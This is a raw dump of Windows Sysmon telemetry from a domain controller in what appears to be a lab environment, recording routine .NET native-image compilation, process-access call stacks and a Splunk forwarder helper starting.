13:49:42.932{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F6-6005-3E03-00000000A301}920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:42.917{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F6-6005-3E03-00000000A301}920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:42.917{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F6-6005-3E03-00000000A301}920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.979{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91F8-6005-4103-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.979{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F8-6005-4103-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.932{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F8-6005-4003-00000000A301}4656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.917{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F8-6005-4003-00000000A301}4656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.917{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F8-6005-4003-00000000A301}4656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:44.792{59A5CD1D-91F6-6005-3E03-00000000A301}920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\398-0\Microsoft.ActiveDirectory.Management.dll2021-01-18 13:49:44.792 10341000x80000000000000007554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91F8-6005-3F03-00000000A301}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91F8-6005-3F03-00000000A301}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91F8-6005-3F03-00000000A301}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-91F8-6005-3F03-00000000A301}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.995{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F9-6005-4603-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.979{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4603-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.979{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F9-6005-4603-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 